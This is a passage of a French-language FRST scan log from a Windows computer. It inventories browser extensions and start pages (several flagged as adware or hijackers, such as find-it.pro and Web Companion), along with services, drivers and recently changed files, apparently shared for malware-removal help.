Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{93b89af9-f2e8-4eff-ac3c-3adfa648e84d}: [DhcpNameServer] 192.168.1.1 Edge: ======= Edge DefaultProfile: Default Edge Profile: C:\Users\Hdupo\AppData\Local\Microsoft\Edge\User Data\Default [2023-03-25] Edge HomePage: Default -> hxxp://www.google.fr/ Edge StartupUrls: Default -> "hxxp://www.google.fr/" Edge Extension: (Discord Token Login) - C:\Users\Hdupo\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ealjoeebhfijfimofmecjcjcigmadcai [2022-02-24] Edge Extension: (T-Сashback — кэшбэк-сервис) - C:\Users\Hdupo\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\odbmjgikedenicicookngdckhkjbebpd [2022-02-08] Edge Profile: C:\Users\Hdupo\AppData\Local\Microsoft\Edge\User Data\Profile 1 [2023-03-19] Edge HKLM-x32\...\Edge\Extension: [odbmjgikedenicicookngdckhkjbebpd] FireFox: ======== FF DefaultProfile: 9rqc0y5g.default FF ProfilePath: C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\9rqc0y5g.default [2023-03-31] FF Homepage: Mozilla\Firefox\Profiles\9rqc0y5g.default -> hxxps://fr.search.yahoo.com/yhs/web?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__hp_WCYID10118__220224__yaff FF NewTab: Mozilla\Firefox\Profiles\9rqc0y5g.default -> hxxps://fr.search.yahoo.com/yhs/web?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__hp_WCYID10118__220224__yaff FF Extension: (Mail.ru NewTab) - C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\9rqc0y5g.default\Extensions\{c4c9b8f3-3c9b-41c2-827e-569e556fcb8a}.xpi [2022-02-08] FF SearchPlugin: C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\9rqc0y5g.default\searchplugins\cdnsearch.xml [2022-02-08] FF ProfilePath: C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\n1dtqyko.default-release-1675367441117 [2023-03-31] FF Extension: (AdBlock — le meilleur bloqueur de pubs) - C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\n1dtqyko.default-release-1675367441117\Extensions\jid1-NIfFY2CA8fy1tg@jetpack.xpi [2023-03-06] FF Extension: (Galaxy Space Theme) - C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\n1dtqyko.default-release-1675367441117\Extensions\{5eae7880-dab2-4337-bc53-e4b58db7aec4}.xpi [2023-02-02] FF Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\n1dtqyko.default-release-1675367441117\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2023-03-23] FF Plugin: @java.com/DTPlugin,version=11.361.2 -> C:\Program Files\Java\jre1.8.0_361\bin\dtplugin\npDeployJava1.dll [2023-01-09] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.361.2 -> C:\Program Files\Java\jre1.8.0_361\bin\plugin2\npjp2.dll [2023-01-09] (Oracle America, Inc. -> Oracle Corporation) FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2023-03-21] (Adobe Inc. -> Adobe Systems Inc.) FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\iaqizjac3yr.js [2022-02-24] <==== ATTENTION (Pointe vers un fichier *.cfg) FF ExtraCheck: C:\Program Files\mozilla firefox\iaqizjac3yr.cfg [2022-02-24] <==== ATTENTION Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default [2023-03-31] CHR HomePage: Default -> hxxp://www.accueil-nav.com/ CHR StartupUrls: Default -> "hxxp://www.google.fr/","hxxps://find-it.pro/?utm_source=distr_m" CHR Extension: (AutoDraw for skribbl.io) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpnefockcbbpkbahgkkacjmebfheacjb [2023-01-20] CHR Extension: (Discord Token Login) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\ealjoeebhfijfimofmecjcjcigmadcai [2022-02-24] CHR Extension: (YoutubeDownloader) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo [2022-02-08] [UpdateUrl:hxxps://clients81.google.com/service/update2/crx] <==== ATTENTION CHR Extension: (Google Docs hors connexion) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-10-08] CHR Extension: (AdBlock — le meilleur bloqueur de pubs) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2023-03-31] CHR Extension: (Google Translate) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfhgpjbcoignfibliobpclhpfnadhofn [2022-02-08] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-09-03] CHR Profile: C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Guest Profile [2023-03-31] CHR HomePage: Guest Profile -> hxxps://find-it.pro/?utm_source=distr_m CHR StartupUrls: Guest Profile -> "hxxps://find-it.pro/?utm_source=distr_m" CHR DefaultSearchKeyword: Guest Profile -> cdn CHR DefaultSuggestURL: Guest Profile -> hxxps://www.google.ru/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&q={searchTerms} CHR Extension: (YoutubeDownloader) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo [2022-02-08] [UpdateUrl:hxxps://clients38.google.com/service/update2/crx] <==== ATTENTION CHR Extension: (Find-it.Pro Search) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\meejmcfbiapijdfaadackoblffmidlig [2022-02-08] CHR Profile: C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\System Profile [2023-03-31] CHR HomePage: System Profile -> hxxps://find-it.pro/?utm_source=distr_m CHR StartupUrls: System Profile -> "hxxps://find-it.pro/?utm_source=distr_m" CHR DefaultSearchKeyword: System Profile -> cdn CHR DefaultSuggestURL: System Profile -> hxxps://www.google.ru/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&q={searchTerms} CHR Extension: (YoutubeDownloader) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo [2022-02-08] [UpdateUrl:hxxps://clients42.google.com/service/update2/crx] <==== ATTENTION CHR Extension: (Find-it.Pro Search) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\meejmcfbiapijdfaadackoblffmidlig [2022-02-08] Opera: ======= OPR Profile: C:\Users\Hdupo\AppData\Roaming\Opera Software\Opera Stable [2023-03-31] OPR Extension: (Rich Hints Agent) - C:\Users\Hdupo\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2022-06-10] OPR Extension: (Opera Crypto Wallet) - C:\Users\Hdupo\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2022-06-10] OPR Extension: (Amazon Assistant Promotion) - C:\Users\Hdupo\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2022-06-10] StartMenuInternet: (HKU\S-1-5-21-274230415-3152524040-1578995417-1001) Opera GXStable - "C:\Users\Hdupo\AppData\Local\Programs\Opera GX\Launcher.exe" StartMenuInternet: (HKU\S-1-5-21-274230415-3152524040-1578995417-1001) OperaStable - "C:\Users\Hdupo\AppData\Local\Programs\Opera\Launcher.exe" ==================== Services (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [173040 2023-02-01] (Adobe Inc. -> Adobe Inc.) S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-06] (Giga-Byte Technology -> ) S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-06-22] (BattlEye Innovations e.K. -> ) R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [Fichier non signé] S3 CCleanerPerformanceOptimizerService; C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe [1072440 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd) R2 CorsairMsiPluginService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CorsairMsiPluginService.exe [451800 2021-07-26] (Corsair Memory, Inc. -> Corsair Memory, Inc.) R2 CorsairService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe [80608 2021-07-26] (Corsair Memory, Inc. -> Corsair Memory, Inc.) S2 DCIService; C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe [3413424 2022-02-24] (Lavasoft Software Canada Inc. -> ) S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-11-01] (EasyAntiCheat Oy -> Epic Games, Inc) S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [935344 2023-01-08] (EasyAntiCheat Oy -> Epic Games, Inc.) R2 EasyTuneEngineService; C:\Program Files (x86)\Gigabyte\EasyTuneEngineService\EasyTuneEngineService.exe [147824 2022-06-14] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) R2 Gservice; C:\Program Files (x86)\GIGABYTE\GService\GCloud.exe [19888 2016-12-02] (GIGA-BYTE TECHNOLOGY CO., LTD. -> Microsoft) R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [11148864 2021-11-03] (Logitech Inc -> Logitech, Inc.) R2 MyService1; C:\Program Files (x86)\Gigabyte\AppCenter\AdjustService.exe [18944 2021-04-08] () [Fichier non signé] S2 OCButtonService; C:\Program Files (x86)\Gigabyte\EasyTuneEngineService\OcButtonService.exe [127360 2021-04-13] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) S3 OverwolfUpdater; C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2577752 2022-08-01] (Overwolf Ltd -> Overwolf LTD) R2 Parsec; C:\Program Files\Parsec\pservice.exe [424584 2022-12-16] (Parsec Cloud, Inc. -> Parsec) R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145736 2013-08-15] (Nuance Communications, Inc. -> Nuance Communications, Inc.) R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [940976 2019-09-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.) R2 Serviio; C:\Program Files\Serviio\bin\ServiioService.exe [413696 2020-05-03] () [Fichier non signé] R2 Smart TimeLock; C:\Program Files (x86)\GIGABYTE\Smart TimeLock\TimeMgmtDaemon.exe [102400 2013-02-22] (Gigabyte Technology CO., LTD.) [Fichier non signé] S3 ss_conn_launcher_service; C:\Windows\System32\Samsung\EasySetup\ss_conn_launcher.exe [182392 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [16360768 2022-08-14] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [22960 2022-02-24] (Lavasoft Software Canada Inc. -> ) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\NisSrv.exe [3224328 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MsMpEng.exe [133544 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation) S2 CorsairGamingAudioConfig; C:\Windows\System32\CorsairGamingAudioCfgService64.exe [X] S2 CorsairLLAService; "C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CueLLAccessService.exe" [X] S3 CredentialEnrollmentManagerUserSvc; %SystemRoot%\system32\CredentialEnrollmentManager.exe [X] S3 CredentialEnrollmentManagerUserSvc_b23ea; C:\Windows\system32\CredentialEnrollmentManager.exe [X] S3 EpicOnlineServices; "C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe" [X] R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nvddig.inf_amd64_49c60aac2cd2e569\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nvddig.inf_amd64_49c60aac2cd2e569\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem S2 RichVideo64; "C:\Program Files\CyberLink\Shared files\RichVideo64.exe" [X] S3 Rockstar Service; "G:\Games\Nouveau dossier\RockstarService.exe" [X] S2 tmHInstall; C:\Program Files\Thrustmaster\T.Flight Hotas\drivers\amd64\tmHInstall.exe [X] ===================== Pilotes (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R3 AmdTools64; C:\Windows\System32\drivers\AmdTools64.sys [63392 2020-06-16] (Microsoft Windows Hardware Compatibility Publisher -> ) R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] (GIGA-BYTE TECHNOLOGY CO., LTD. -> ) S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) R2 BdDci; C:\Windows\system32\DRIVERS\bddci.sys [367096 2022-02-24] (Bitdefender SRL -> Bitdefender) S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 CorsairGamingAudioService; C:\Windows\System32\drivers\CorsairGamingAudio64.sys [60328 2021-06-30] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R2 CorsairLLAccessC2D033F14715AA7325305EA42FBFC65BF867CC1D; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CorsairLLAccess64.sys [21752 2021-06-24] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R3 CorsairVBusDriver; C:\Windows\System32\drivers\CorsairVBusDriver.sys [45984 2021-06-24] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) R3 CorsairVHidDriver; C:\Windows\System32\drivers\CorsairVHidDriver.sys [21920 2021-06-24] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) R1 CTIIO; C:\Windows\system32\drivers\CtiIo64.sys [32296 2022-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.) S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus2.sys [160376 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) S3 EasyAntiCheat_EOSSys; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.sys [13712896 2023-01-19] (EasyAntiCheat Oy -> EasyAntiCheat Oy) S3 gdrv; C:\Windows\gdrv.sys [26192 2021-09-23] (Giga-Byte Technology -> Windows (R) Server 2003 DDK provider) R3 gdrv3; C:\Windows\System32\drivers\gdrv3.sys [45248 2022-10-13] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) S3 GVCIDrv; C:\Program Files (x86)\GIGABYTE\RGBFusion\GVCIDrv64.sys [18432 2019-12-08] (Microsoft Windows Hardware Compatibility Publisher -> ) R3 HidHide; C:\Windows\System32\drivers\HidHide.sys [61408 2021-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.) R2 inpoutx64; C:\Windows\System32\Drivers\inpoutx64.sys [15008 2021-08-20] (Red Fox UK Limited -> Highresolution Enterprises [www.highrez.co.uk]) R2 LGHUBTemperatureService; C:\Program Files\LGHUB\logi_core_temp.sys [22864 2021-08-20] (Logitech Inc -> Logitech) S3 logi_audio_surround; C:\Windows\system32\drivers\logi_audio_surround.sys [44488 2021-11-03] (Logitech Inc -> Logitech) R3 logi_joy_bus_enum; C:\Windows\system32\drivers\logi_joy_bus_enum.sys [37200 2021-08-20] (Logitech Inc -> Logitech) R3 logi_joy_vir_hid; C:\Windows\system32\drivers\logi_joy_vir_hid.sys [25928 2021-08-20] (Logitech Inc -> Logitech) R3 logi_joy_xlcore; C:\Windows\system32\drivers\logi_joy_xlcore.sys [66896 2021-08-20] (Logitech Inc -> Logitech) R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [17424 2023-03-29] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd) R3 NvModuleTracker; C:\Windows\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_0c1cc60a4b422185\NvModuleTracker.sys [45656 2022-11-13] (Nvidia Corporation -> NVIDIA Corporation) R3 parsecvusba; C:\Windows\System32\drivers\parsecvusba.sys [256560 2022-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Parsec) S3 pbfilter; C:\Program Files\PeerBlock\pbfilter.sys [22600 2014-01-14] (PeerBlock, LLC -> ) R3 SnapCameraVirtualDevice; C:\Windows\System32\drivers\SnapCameraVirtualDevice.sys [2800232 2022-07-26] (Snap Inc. -> Windows (R) Win 7 DDK provider) S0 Spybot3ELAM; C:\Windows\System32\drivers\Spybot3ELAM.sys [19904 2019-06-21] (Microsoft Windows Early Launch Anti-malware Publisher -> Windows (R) Win 7 DDK provider) S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [167544 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) S3 ss_conn_usb_driver2; C:\Windows\System32\Drivers\ss_conn_usb_driver2.sys [43640 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) S1 UsbCharger; C:\Windows\System32\DRIVERS\UsbCharger.sys [22240 2013-10-24] (GIGA-BYTE TECHNOLOGY CO., LTD. -> ) R3 VBAudioVACMME; C:\Windows\System32\drivers\vbaudio_cable64_win7.sys [41192 2020-07-31] (Vincent Burel -> Windows (R) Win 7 DDK provider) R3 VBAudioVMAUXVAIOMME; C:\Windows\System32\drivers\vbaudio_vmauxvaio64_win10.sys [71920 2021-10-17] (Vincent Burel -> Windows (R) Win 7 DDK provider) R3 VBAudioVMVAIOMME; C:\Windows\System32\drivers\vbaudio_vmvaio64_win10.sys [71712 2021-10-17] (Vincent Burel -> Windows (R) Win 7 DDK provider) R1 ViGEmBus; C:\Windows\System32\drivers\ViGEmBus.sys [165744 2020-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.) R3 VOICEMOD_Driver; C:\Windows\system32\drivers\vmdrv.sys [48136 2021-08-12] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider) S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49608 2023-03-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WDC_SAM; C:\Windows\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.) R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [495896 2023-03-29] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [99624 2023-03-29] (Microsoft Windows -> Microsoft Corporation) S3 BEDaisy; \??\C:\Program Files (x86)\Common Files\BattlEye\BEDaisy.sys [X] S3 cpuz150; \??\C:\Windows\temp\cpuz150\cpuz150_x64.sys [X] S3 CrystalCpuInfo; \??\C:\Users\Hdupo\Desktop\CrystalMark09\CpuInfoX86-64.sys [X] S3 CrystalSysInfo; \??\C:\Users\Hdupo\Desktop\CrystalMark09\SysInfoX64.sys [X] S1 EneTechIo; \??\C:\Windows\system32\drivers\ene.sys [X] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois (créés) (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2023-03-31 16:17 - 2023-03-31 16:27 - 000000000 ____D C:\FRST 2023-03-31 16:13 - 2023-03-31 16:13 - 000000000 ___HD C:\$WinREAgent 2023-03-31 16:04 - 2023-03-31 16:04 - 001130604 _____ C:\Windows\Minidump\033123-9375-01.dmp 2023-03-31 15:43 - 2023-03-31 16:04 - 890177741 _____ C:\Windows\MEMORY.DMP 2023-03-31 15:43 - 2023-03-31 15:43 - 001244204 _____ C:\Windows\Minidump\033123-9312-01.dmp 2023-03-31 15:42 - 2023-03-31 15:42 - 000000000 __SHD C:\found.006 2023-03-29 17:42 - 2023-03-29 17:42 - 014387046 _____ C:\Users\Hdupo\Downloads\notice-perceuse-visseuse-sans-fil-makita-ddf485.pdf 2023-03-29 17:29 - 2023-03-29 17:29 - 000003502 _____ C:\Windows\system32\Tasks\EasyTune 1 2023-03-29 17:29 - 2023-03-29 17:29 - 000003486 _____ C:\Windows\system32\Tasks\GraphicsCardEngine 2023-03-29 17:29 - 2023-03-29 17:29 - 000003402 _____ C:\Windows\system32\Tasks\EasyTune 2023-03-29 17:29 - 2023-03-29 17:29 - 000003392 _____ C:\Windows\system32\Tasks\SIV-VGA 2023-03-29 17:29 - 2023-03-29 17:29 - 000003386 _____ C:\Windows\system32\Tasks\SIV 2023-03-29 17:29 - 2023-03-29 17:29 - 000002075 _____ C:\Users\Public\Desktop\RGBFusion.lnk 2023-03-29 17:29 - 2023-03-29 17:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\AORUS 2023-03-25 17:20 - 2023-03-25 17:20 - 000689292 _____ C:\Users\Hdupo\Downloads\Melodics 3.0.9574.zip 2023-03-25 17:20 - 2023-03-25 17:20 - 000000187 _____ C:\Users\Hdupo\Downloads\Melodics_3.0.9574_Crack.txt 2023-03-25 17:07 - 2023-03-25 17:07 - 017801406 _____ C:\Users\Hdupo\Downloads\Files_Password_1231.rar 2023-03-24 19:06 - 2023-03-24 19:06 - 001281876 _____ C:\Users\Hdupo\Desktop\poussoir def.gcode 2023-03-24 10:47 - 2023-03-24 10:47 - 000012213 _____ C:\Users\Hdupo\Desktop\Sleppy hollow.odt 2023-03-24 10:45 - 2023-03-24 10:45 - 001086184 _____ () C:\Users\Hdupo\Downloads\PDFpower.exe 2023-03-22 14:13 - 2023-03-22 14:13 - 000087336 _____ C:\Users\Hdupo\Desktop\CE3E3V2_poussoir.3mf 2023-03-22 14:03 - 2023-03-22 14:03 - 000390384 _____ C:\Users\Hdupo\Downloads\mBot_şase.stl 2023-03-22 13:56 - 2023-03-29 16:34 - 000000000 ____D C:\Program Files\Mozilla Firefox 2023-03-19 20:21 - 2023-03-24 14:54 - 000000015 _____ C:\Users\Hdupo\AppData\Roaming\obs-virtualcam.txt 2023-03-19 19:07 - 2023-03-31 14:55 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\obs-studio 2023-03-19 19:06 - 2023-03-19 19:06 - 000001012 _____ C:\Users\Public\Desktop\OBS Studio.lnk 2023-03-19 19:06 - 2023-03-19 19:06 - 000000000 ____D C:\ProgramData\obs-studio-hook 2023-03-19 19:05 - 2023-03-19 19:06 - 000000000 ____D C:\Program Files\obs-studio 2023-03-19 19:05 - 2023-03-19 19:05 - 122400536 _____ (OBS Project) C:\Users\Hdupo\Downloads\OBS-Studio-29.0.2-Full-Installer-x64.exe 2023-03-19 16:47 - 2023-03-19 16:47 - 006883740 _____ C:\Users\Hdupo\Desktop\forge-1.19.2-43.2.0-installer.jar 2023-03-19 16:46 - 2023-03-24 22:07 - 000000000 ____D C:\Users\Hdupo\AppData\Local\D3DSCache 2023-03-19 16:45 - 2023-03-26 13:40 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\.minecraft 2023-03-19 16:45 - 2023-03-19 16:45 - 023663800 _____ (TLauncher Inc.) C:\Users\Hdupo\Downloads\TLauncher-2.876-Installer-1.0.7-global.exe 2023-03-19 16:45 - 2023-03-19 16:45 - 023663800 _____ (TLauncher Inc.) C:\Users\Hdupo\Downloads\TLauncher-2.876-Installer-1.0.7-global(1).exe 2023-03-19 16:40 - 2023-03-19 16:40 - 000000000 ____D C:\Program Files (x86)\Windows Kits 2023-03-19 16:40 - 2023-03-19 16:40 - 000000000 ____D C:\Program Files (x86)\Microsoft GameInput 2023-03-19 16:26 - 2023-03-19 16:26 - 000000000 ____D C:\ProgramData\Logishrd 2023-03-19 16:12 - 2023-03-19 16:20 - 000000000 ___HD C:\$SysReset 2023-03-19 16:12 - 2023-03-19 16:12 - 000000000 ____D C:\$Windows.~BT 2023-03-19 16:09 - 2023-03-19 16:09 - 000000000 __SHD C:\found.005 2023-03-19 12:06 - 2023-03-19 12:06 - 000000000 __SHD C:\found.003 2023-03-19 11:34 - 2023-03-19 11:34 - 000000000 __SHD C:\found.001 2023-03-18 16:55 - 2023-03-18 17:59 - 000248832 _____ C:\Windows\system32\UserMgrLog.etl 2023-03-18 16:55 - 2023-03-18 17:59 - 000012288 _____ C:\Windows\system32\umstartup.etl 2023-03-18 16:55 - 2023-03-18 16:55 - 000279552 _____ C:\Windows\system32\UserMgrLogBackup.etl 2023-03-18 16:55 - 2023-03-18 16:55 - 000015360 _____ C:\Windows\system32\umstartup000.etl 2023-03-18 13:51 - 2023-03-19 16:14 - 000000000 __SHD C:\found.004 2023-03-17 22:34 - 2023-03-31 15:43 - 000000000 ____D C:\Windows\system32\%LOCALAPPDATA% 2023-03-17 22:33 - 2023-03-18 17:01 - 000635256 _____ C:\Windows\ntbtlog.txt 2023-03-15 20:13 - 2023-03-15 20:20 - 018067275 _____ C:\Users\Hdupo\Documents\DIAPÖ ORAL.odp 2023-03-15 20:10 - 2023-03-15 20:10 - 000015432 _____ C:\Users\Hdupo\Desktop\feuille.odt 2023-03-01 22:19 - 2023-03-22 20:29 - 000000000 ____D C:\Users\Hdupo\AppData\Local\Roblox ==================== Un mois (modifiés) ================== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2023-03-31 16:28 - 2022-11-16 14:33 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\discord 2023-03-31 16:27 - 2022-11-06 16:48 - 000000000 ____D C:\Users\Hdupo\Desktop\jules 2023-03-31 16:26 - 2023-02-11 22:56 - 000001207 _____ C:\Users\Hdupo\Desktop\Google Chrome.lnk 2023-03-31 16:26 - 2021-08-20 15:01 - 000000000 ____D C:\Users\Hdupo\AppData\Local\LGHUB 2023-03-31 16:23 - 2022-02-08 19:59 - 000000000 ____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38 2023-03-31 16:23 - 2021-09-03 17:38 - 000000000 ____D C:\Program Files\CCleaner 2023-03-31 16:23 - 2021-09-03 10:09 - 000000000 ____D C:\Program Files (x86)\Google 2023-03-31 16:22 - 2022-11-26 15:11 - 000000000 ____D C:\ProgramData\NVIDIA 2023-03-31 16:22 - 2022-11-16 14:13 - 000000000 ____D C:\Users\Hdupo\AppData\Local\Discord 2023-03-31 16:22 - 2021-08-20 15:00 - 000000000 ____D C:\Users\Hdupo\AppData\LocalLow\Mozilla 2023-03-31 16:21 - 2022-09-03 16:59 - 000000000 ____D C:\Program Files\TeamViewer 2023-03-31 16:21 - 2022-02-08 19:58 - 000000008 __RSH C:\ProgramData\ntuser.pol 2023-03-31 16:21 - 2021-08-20 15:01 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\LGHUB 2023-03-31 16:21 - 2021-08-20 14:22 - 000008192 ___SH C:\DumpStack.log.tmp 2023-03-31 16:21 - 2021-08-20 14:22 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2023-03-31 16:21 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\Registration 2023-03-31 16:21 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2023-03-31 16:20 - 2021-08-20 14:26 - 000000000 ____D C:\Users\Hdupo 2023-03-31 16:20 - 2019-12-07 11:03 - 000524288 _____ C:\Windows\system32\config\BBI 2023-03-31 16:19 - 2023-01-19 13:57 - 000000000 ____D C:\Users\Hdupo\AppData\LocalLow\Temp 2023-03-31 16:18 - 2019-12-07 11:14 - 000000000 ___HD C:\Windows\system32\GroupPolicy 